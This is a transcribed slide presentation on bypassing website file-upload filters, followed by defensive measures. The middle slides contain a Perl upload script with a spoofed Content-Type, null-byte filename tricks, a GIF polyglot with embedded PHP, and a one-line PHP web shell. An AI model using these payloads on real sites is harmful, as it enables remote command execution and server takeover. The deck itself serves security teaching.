bypass file upload restrictions
DESCRIPTION
Bypass file upload restrictionsTRANSCRIPT
![Page 1: Bypass file upload restrictions](https://reader030.vdocument.in/reader030/viewer/2022012313/5575919bd8b42ae7708b4fb0/html5/thumbnails/1.jpg)
BYPASS FILE UPLOAD RESTRICTIONS ON WEBSITES
AND SECURITY MEASURES
By K. Subramanian K. R. Mukesh
![Page 2: Bypass file upload restrictions](https://reader030.vdocument.in/reader030/viewer/2022012313/5575919bd8b42ae7708b4fb0/html5/thumbnails/2.jpg)
File upload
• Necessity• Social networking websites, blogs, File sharing,
etc.• Web developers do not consider the threats• Files should be sanitized • If not, leads to local file inclusion and hacking• Filtering mechanisms
![Page 3: Bypass file upload restrictions](https://reader030.vdocument.in/reader030/viewer/2022012313/5575919bd8b42ae7708b4fb0/html5/thumbnails/3.jpg)
Methods of filtering
![Page 4: Bypass file upload restrictions](https://reader030.vdocument.in/reader030/viewer/2022012313/5575919bd8b42ae7708b4fb0/html5/thumbnails/4.jpg)
Content-Type verification
• HTTP POST – MIME typeContent-Disposition: form-data;
name="uploaded file []";filename="18.jpg"\r\n Content-Type : image/jpeg\r\n\r <file content>
• To bypass this filter, edit the Content-Type to an applicable one.
#!/usr/bin/perl#use LWP;use HTTP::Request::Common;$ua = $ua = LWP::UserAgent->new;;$req = $ua->request(POST'http://example.com/upload.PHP',Content_Type => 'form-data',Content => [userfile => ["sh.PHP", "sh.PHP","Content-Type" =>"application/pdf"],],);print $req->as_string();
![Page 5: Bypass file upload restrictions](https://reader030.vdocument.in/reader030/viewer/2022012313/5575919bd8b42ae7708b4fb0/html5/thumbnails/5.jpg)
An easy way – Tamper data
• Tamper data – Mozilla add-on allows to modify the POST data before submit
![Page 6: Bypass file upload restrictions](https://reader030.vdocument.in/reader030/viewer/2022012313/5575919bd8b42ae7708b4fb0/html5/thumbnails/6.jpg)
Filename extension verification
• Check the extension of the file• Filter out malicious extensions
$blacklist = array(".php", ".phtml", ".php3", ".php4");
• To bypass this, use NULL BYTES in filenamesh.php%00.pdf
(or)sh.asp;xx.pdf
• While uploading, extension is .pdf• When accessed, delivered to PHP interpreter
![Page 7: Bypass file upload restrictions](https://reader030.vdocument.in/reader030/viewer/2022012313/5575919bd8b42ae7708b4fb0/html5/thumbnails/7.jpg)
File content verification
• Applicable to image files• $imageinfo =getimagesize($_FILES['userfile']['tmp_name']);
• To bypass this, manually craft an image file with an embedded PHP code
Content-Type: image/gifGIF89a(...some binary data...)<?PHP
System($_GET[‘command’]);?>(....binary data…)
• PHP interpreter execute the php code inside a garbage of binary values
![Page 8: Bypass file upload restrictions](https://reader030.vdocument.in/reader030/viewer/2022012313/5575919bd8b42ae7708b4fb0/html5/thumbnails/8.jpg)
A Simple Demonstration
Towards Bypassing these Filters
![Page 9: Bypass file upload restrictions](https://reader030.vdocument.in/reader030/viewer/2022012313/5575919bd8b42ae7708b4fb0/html5/thumbnails/9.jpg)
![Page 10: Bypass file upload restrictions](https://reader030.vdocument.in/reader030/viewer/2022012313/5575919bd8b42ae7708b4fb0/html5/thumbnails/10.jpg)
Worst case scenario
• Local file inclusion – PHP shell upload• Simple PHP shell:
<?php System ($_GET [‘command’]);?>
• Executes commands on remote serverwww.example.com/uploads/sh.php?command=‘ifconfig’
• Entire control of the server – rooting it• Defacements, database access, credential
information theft, etc.
![Page 11: Bypass file upload restrictions](https://reader030.vdocument.in/reader030/viewer/2022012313/5575919bd8b42ae7708b4fb0/html5/thumbnails/11.jpg)
Security Measures
• Preventing direct access to the uploaded files$uploaddir = '/var/spool/uploads/';
# Outside of root
• Block web access using .htaccess fileIndexIgnore */*
• Overhead to read and write• Sometimes leads to potential directory
traversal attacks
![Page 12: Bypass file upload restrictions](https://reader030.vdocument.in/reader030/viewer/2022012313/5575919bd8b42ae7708b4fb0/html5/thumbnails/12.jpg)
Random file name implementation
• Prevents attacker knowing the name of the file uploaded
• Map the names in the database$res = $db->query("INSERT INTO uploads SET name=?,original_name=?”)
• Query while reading• A little overhead, but secure• Think again, leads to SQL injection
![Page 13: Bypass file upload restrictions](https://reader030.vdocument.in/reader030/viewer/2022012313/5575919bd8b42ae7708b4fb0/html5/thumbnails/13.jpg)
Conclusion
• Complicated to implement a secure file upload facility
• Many filters = slow response. Leads to Denial Of Service (DOS) attacks
• Best way is to maintain UPLOAD LOGS containing user info like ip address, helpful to trace an attacker
• Secure coding practices
![Page 14: Bypass file upload restrictions](https://reader030.vdocument.in/reader030/viewer/2022012313/5575919bd8b42ae7708b4fb0/html5/thumbnails/14.jpg)
Thank you